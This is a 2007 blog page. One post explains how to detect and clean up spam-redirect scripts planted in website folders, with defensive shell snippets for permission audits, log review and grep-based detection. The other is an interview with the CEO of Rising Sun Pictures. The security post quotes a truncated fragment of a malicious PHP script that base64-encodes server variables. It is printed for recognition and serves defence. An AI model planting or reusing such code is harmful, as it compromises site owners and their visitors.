debfoocode.net

Blogging about Technology, Careers in IT, and other general ramblings…

Browsing Posts published in August, 2007

One thing you should never take for granted is the security of your website. All it takes is for one folder to have the wrong access permissions assigned to it, and someone has found a way in. Just as Google (and all other search engines) send out their spiders and robots to scour the Internet looking for sites and links, spammers send out scripts that look for a folder or site that they can exploit.

Once they have found a folder, they tend not to make it too obvious to the site owner. Instead, they plant a script in the folder that allows them to redirect to other (spam) sites from your web site, using up your bandwidth. The file typically looks like a normal script and can remain unnoticed for quite some time.

The first thing to do to improve the security of your site is to check that the permissions on each folder and file are set to the right level. There are several ways to set the permission levels, depending on which server you use. If your website is on an Apache server, you would use Unix commands to set the permissions. The command to set the permissions is chmod. For a detailed explanation of chmod, have a look at the Wikipedia page: http://en.wikipedia.org/wiki/Chmod

Basically, you would not want any directory or file to have the chmod permissions of 777. These permissions give everyone (owner, group, and public) read, write and execute permissions. If you come across any directories with these permissions, change them to 755. Images and files should have the permissions of 644.
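The permission check described above, as an added shell example that is not part of the original post: it lists everything under a web root that has mode 777 and resets those directories to 755 and those files to 644. The function names are hypothetical, and the web root is whatever path you pass in.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# audit_perms WEBROOT
# Print every directory or regular file whose mode is exactly 777.
audit_perms() {
    find "$1" \( -type d -o -type f \) -perm 0777 -print
}

# count_world_writable WEBROOT
# Count entries that "other" can write to (777, 666, 757, ...). This is a
# wider net than 777 alone and is worth reviewing by hand.
count_world_writable() {
    find "$1" \( -type d -o -type f \) -perm -0002 -print | wc -l | tr -d ' '
}

# fix_perms WEBROOT
# Change only what the audit flagged: 777 directories become 755 and
# 777 files become 644. Everything else is left untouched, so scripts
# that legitimately need their execute bit keep it.
fix_perms() {
    find "$1" -type d -perm 0777 -exec chmod 755 {} +
    find "$1" -type f -perm 0777 -exec chmod 644 {} +
}

# Typical use, run from the account that owns the site:
#   audit_perms "$HOME/public_html"
#   fix_perms   "$HOME/public_html"
```

Run `audit_perms` first and read the list before calling `fix_perms`, since a 777 directory you did not create is itself a finding.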

Another important thing to do with your website is to perform a regular backup. If anything or anyone compromises your site, you will at least have a ‘safe’ copy of the site that you can either install over the top, or refer back to.

How to Tell if Your Site Has Been Compromised

Regularly checking the statistics of your website is a great way to see if anything unusual is happening. Statistics are provided by the web host through cPanel, and include tools such as ‘Latest Visitors’, ‘AWStats’ and ‘Webalizer’. Latest Visitors shows the last 300 people that have accessed your site. Have a look at your Latest Visitors, and check that everything appears normal.

Things to look out for are: /images/2007/08//someFileNeverSeenBefore.html

The point that I am trying to make here is to look for files you do not recognise that appear to be coming from a directory on your site. What might start off as a few of these strange files can quickly turn into hundreds.
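The same check can be run against the raw access log instead of the cPanel view. This is an added example, not part of the original post; it assumes Apache's common/combined log format and that images live under /images/, and the log lines in it are constructed.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes Apache common/combined
# log format: field 7 is the request path, field 9 the status code.

# sample_log: constructed log lines (documentation IP ranges) for a dry run.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [14/Aug/2007:09:01:12 +0930] "GET /images/2007/08/header.jpg HTTP/1.1" 200 18211
203.0.113.5 - - [14/Aug/2007:09:02:40 +0930] "GET /images/2007/08/someFileNeverSeenBefore.html HTTP/1.1" 200 512
203.0.113.9 - - [14/Aug/2007:09:02:41 +0930] "GET /images/2007/08/someFileNeverSeenBefore.html HTTP/1.1" 200 512
198.51.100.7 - - [14/Aug/2007:09:03:02 +0930] "GET /images/2007/08/someFileNeverSeenBefore.html?id=3 HTTP/1.1" 302 0
198.51.100.7 - - [14/Aug/2007:09:03:05 +0930] "GET /images/2007/08/.htaccess HTTP/1.1" 403 210
192.0.2.44 - - [14/Aug/2007:09:04:19 +0930] "GET /images/2007/07/cache.php HTTP/1.1" 200 77
192.0.2.44 - - [14/Aug/2007:09:04:20 +0930] "GET /index.php HTTP/1.1" 200 9120
192.0.2.10 - - [14/Aug/2007:09:05:00 +0930] "GET /images/logo.PNG HTTP/1.1" 304 0
EOF
}

# odd_image_requests [LOGFILE...]
# Print "count path" for every path under /images/ that is not an image and
# was actually served (2xx or 3xx), busiest first. 4xx probes are skipped
# because nothing was delivered. Reads stdin when no file is given.
odd_image_requests() {
    awk '
        {
            path = $7; status = $9
            sub(/\?.*/, "", path)                 # ignore the query string
            if (path !~ /^\/images\//) next       # only the image tree
            if (status !~ /^(2|3)/) next          # only served responses
            if (tolower(path) ~ /\.(jpe?g|png|gif|ico)$/) next
            hits[path]++
        }
        END { for (p in hits) printf "%d %s\n", hits[p], p }
    ' "$@" | sort -rn
}

# Dry run on the constructed sample:
#   sample_log | odd_image_requests
```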

What to Do if Your Site Has Been Compromised

If you happen to find suspicious links coming from your site, or you have found malicious scripts running from your directories, you will need to go over everything in the infected area (whether that be a particular folder, or the whole site).

To be extra cautious, it would pay to do a complete backup of the site. At the very least, if you delete the wrong file, you can always restore it. It is also a lot easier to go over the files when they are located locally on your PC. To further test your files, you could run a virus scanner over every file.

Once you have located the malicious script, delete it. Basically, any image directory should contain only images (this is particularly useful for WordPress users). There should not be any .htaccess files located in the directories, unless of course you have created them and you know exactly what they do.

An example of a partial malicious file is:

["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64

An explanation of what this type of file is doing can be found here.
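A sweep for the two things described above, as an added example that is not part of the original post: files in an image directory that are not images (which includes any .htaccess), and files of any name that contain PHP like the fragment shown. Function names and the list of image extensions are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# list_non_images DIR
# Print every regular file under DIR whose name does not end in a common
# image extension. .htaccess files fall into this list as well.
list_non_images() {
    find "$1" -type f \
        ! -iname '*.jpg' ! -iname '*.jpeg' ! -iname '*.png' \
        ! -iname '*.gif' ! -iname '*.ico' -print
}

# list_php_content DIR
# Print files under DIR that contain a PHP open tag, a base64_encode( call
# or a $_SERVER[ lookup, whatever the file is called. This catches a script
# that has been given an image extension.
list_php_content() {
    # grep exits 1 when nothing matches; that is a clean result, not an error.
    find "$1" -type f -exec \
        grep -l -E '<\?php|base64_encode[[:space:]]*\(|\$_SERVER\[' {} + || :
}

# sweep_image_dir DIR
# Run both checks and tag each finding with the reason it was flagged.
sweep_image_dir() {
    list_non_images "$1"  | sed 's/^/NOT-IMAGE  /'
    list_php_content "$1" | sed 's/^/PHP-CODE   /'
}

# Typical use against a local copy of the site:
#   sweep_image_dir ./backup/public_html/images
```

Review each hit before deleting anything; a .htaccess you wrote yourself will appear in the NOT-IMAGE list too.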

Once the file in question has been erased, I would go over every single file/folder in the infected area and check that the permissions are correct. To be on the safe side, I would replace every file in the infected folder/s with a safe backed up version. Depending on where the compromise took place, you may need to change all of your passwords.

When you are happy with the changes to the site, you should delete the backed up ‘compromised’ version of the site.

An additional point of reference is the Google Webmaster site. This site can be used to remove dead (rogue) links and also to see who is linking to your site.

To use the Google Webmaster site you will need to verify your site first. The Google Webmaster site will explain exactly what you need to do to verify your site.

Finally, if there is anything you would like to add to this post, or if there is anything that I have left out that should be mentioned, please let me know. Helping people combat spammers is in the best interest of every decent web owner.

It is with great pleasure that I introduce Didier Elzinga as the latest ‘Interview with an IT Professional’. Didier Elzinga is the CEO of Rising Sun Pictures, Australia’s leading visual effects company. Rising Sun Pictures have been involved in producing visual effects for many Hollywood blockbusters, including the latest Harry Potter movie (Harry Potter and the Order of the Phoenix), as well as Charlotte’s Web, Superman Returns, Batman Returns and Lord of the Rings: The Return of the King (to name a few). For more information on Rising Sun Pictures, check out their website: www.rsp.com.au

A graduate of Adelaide University, you studied Computer Science before applying as a software engineer for Rising Sun Pictures. What was your career like prior to becoming the CEO?

I started at RSP straight out of uni and worked in a range of roles across the company. I started life as a software developer (writing tools for motion control rigs and colour conversions), moved into compositing (2d image processing), then onto films, running a small team, supervising, operations management, CTO (chief technology officer), head of vfx and ultimately CEO. I tried to leave twice – got convinced to stay, co-founded a software company with the founders of RSP, started a food business and generally made sure I had too much to do.

It is so amazing how someone so young could become a CEO. What was it that made you want to stop developing for the company, and start leading?

Part of it was that someone needed to do it. The other part was that I was naturally a good generalist and I enjoyed problem solving and working with people. By moving into a leadership role I found I could add more value to those around me than by trying to do it myself. Within a couple of years the results, both technically and creatively, that those I was working with were achieving dwarfed what I could have done if I had just kept relying on my own skills.

Were you faced with any challenges once you took on the role of CEO?

Absolutely. Not long after I started working as CEO we made a strategic shift to focus purely on film that almost killed us when the market vanished as a result of 9/11 & a Screen Actors Guild strike. As evidenced by being here today we survived ….

What has been the biggest highlight so far in your career?

Winning work on “Lord of the Rings: Return of the King” was, at the time, a pretty huge thing. On the whole though it is more a collection of small wins and satisfaction in the path we have taken than a single moment.

What would you like to achieve that you haven’t already?

Organisationally winning an Oscar and VES (Visual Effects Society) award for best VFX would be up there.

Your career and what you have achieved is inspirational to young people studying computer science all over the world. What advice would you give to people wanting to follow in your footsteps?

Computer science at its heart is about understanding how to cope with complexity and to use abstraction. As such it is a great starting point for a career in many areas – just remember that writing software is only a means to an end not an end in itself.

I love that Rising Sun Pictures, Australia’s leading visual effects company is based in Adelaide, with another office in Sydney. What are some of the benefits you have found by having the company based in Adelaide?

There is a shared culture of being able to do the work from anywhere. People in Adelaide tend to bag the city a lot – but then don’t get out and go somewhere else or do something about it. I love the city, like living here and am unapologetic about what it is. We are a smaller city with a great quality of life and we are also a stage upon which you can compete with the best in the world. (Not to mention the advantage of being in some of the best wine country in the world).

What have been some of the challenges?

Culture and people are always the biggest challenge. No matter what you have achieved every day you have to earn the respect of those who work for you and those you want to work for you.

Rising Sun Pictures has worked on many blockbusters, including the recently released Harry Potter and the Order of the Phoenix, and other impressive features like: 28 Weeks Later, Blood Diamond, Charlotte’s Web, Superman Returns, Harry Potter and the Goblet of Fire, Batman Returns, The Last Samurai and the Lord of the Rings: Return of the King.

How did Rising Sun Pictures manage to land deals with the biggest movie studios?

Persistence. We understand what we are good at and we work very hard at finding people who value that. Once we work with someone we do our best to develop that into a long term relationship. The rest of it is just hard work.

How were you able to overcome the challenges of working on projects with teams of people based all over the world?

Hollywood is quite good at playing the global game – and as Australians all our customers are thousands of miles away. You accept that and learn to live with it as a reality. And you get up very early and go to bed very late to cover all the timezones …

As a huge Harry Potter fan, are you able to say what scene/s Rising Sun Pictures were involved in with the recently released Harry Potter and the Order of the Phoenix?

We worked on a range of sequences across the film – with the main one probably being the exterior of the Grimmauld Place house as it emerges from between two other buildings.

According to your website, you are currently looking to recruit more people. How would you describe a typical day at the Rising Sun Pictures office?

There is no such thing as a typical day :) It depends on your role and what projects are on but the heart beat of our company is whatever films are currently in the building. Several times each day we will review the material we are working on (in dailies or smaller meetings) and for the rest we are working to a schedule on our own work or focussing on improving the environment around us – be it by writing code, setting up training material or debating a decision about what the company should do in a specific situation.

What should people expect if they are lucky enough to land themselves a job working for Rising Sun Pictures?

Lots of hard work. The film industry is notoriously high stress and impact at the pointy end of a show (although we do our best to minimise that). Also an environment in which you are expected to have an opinion and to get involved.

There is nothing worse than someone saying “somebody should”.

What are the future plans of Rising Sun Pictures?

Depends a little on what projects we win but the current plan is to continue to focus on high end Hollywood visual effects, consolidate our position as Australia’s most credited film visual effects company and build up our reputation as one of the world’s pre-eminent vfx boutiques.